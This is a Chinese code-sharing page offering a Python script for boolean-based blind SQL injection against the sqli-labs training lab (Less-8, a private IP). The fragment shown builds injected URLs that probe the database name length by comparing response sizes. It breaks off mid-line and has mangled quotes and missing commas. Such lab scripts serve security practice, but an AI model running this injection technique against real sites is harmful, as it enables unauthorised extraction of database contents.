资源简介
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
代码片段和文件信息
import requests
import binascii
MAX_DBName_len = 100
MAX_TableName_len = 100
MAX_ColumnName_len = 100
MAX_Data_len = 100
MAX_Table_Num = 100
MAX_Column_Num = 100
MAX_Data_Num = 100
success_url = “http://192.168.80.136/Less-8/?id=1“
success_response_len = len(requests.get(success_url).text)
chars = ‘0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}_!@#$%^&*()‘
def get_DBName_len():
print(“Start to get DBName_len...“)
DBName_len = 0
url_template = success_url + “‘ and (length(database())={0}) %2D%2D%20“
for i in range(0 MAX_DBName_len):
url = url_template.format(i)
response = requests.get(url)
if len(response.text) == success_response_len:
DBName_len = i;
print(“DBName_len is: “ DBName
评论
共有 条评论